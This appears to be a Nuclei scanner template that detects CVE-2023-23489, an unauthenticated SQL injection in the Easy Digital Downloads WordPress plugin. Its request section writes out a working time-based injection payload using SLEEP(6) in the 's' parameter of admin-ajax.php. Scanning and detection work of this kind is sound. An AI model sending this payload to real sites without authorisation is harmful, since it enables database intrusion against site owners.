2023-02-12 07:21:47 +00:00
id : CVE-2023-23489
info :
name : Easy Digital Downloads 3.1.0.2 & 3.1.0.3 - Unauthenticated SQLi
author : theamanrawat
severity : critical
description : |
The Easy Digital Downloads WordPress Plugin, versions 3.1.0.2 & 3.1.0.3, is affected by an unauthenticated SQL injection vulnerability in the 's' parameter of its 'edd_download_search' action.
reference :
- https://wpscan.com/vulnerability/c5a6830c-6420-42fc-b20c-8e20224d6f18
- https://wordpress.org/plugins/easy-digital-downloads/
- https://nvd.nist.gov/vuln/detail/CVE-2023-23489
2023-02-17 03:41:43 +00:00
- https://www.tenable.com/security/research/tra-2023-2
2023-02-12 07:21:47 +00:00
classification :
2023-02-17 03:41:43 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-02-12 07:21:47 +00:00
cve-id : CVE-2023-23489
2023-02-17 03:41:43 +00:00
cwe-id : CWE-89
2023-02-12 07:21:47 +00:00
metadata :
verified : "true"
2023-02-17 03:41:43 +00:00
tags : easy-digital-downloads,wpscan,wordpress,wp,wp-plugin,unauth,cve,cve2023,sqli
2023-02-12 07:21:47 +00:00
requests :
- raw :
- |
@timeout : 10s
GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host : {{Hostname}}
2023-02-17 03:10:18 +00:00
- |
GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1
Host : {{Hostname}}
2023-02-12 07:21:47 +00:00
matchers :
- type : dsl
dsl :
2023-02-17 03:10:18 +00:00
- 'duration_1>=6'
- 'status_code_1 == 200'
- 'contains(body_1, "[]") && contains(body_2, "Easy Digital Downloads")'
2023-02-15 18:29:27 +00:00
condition : and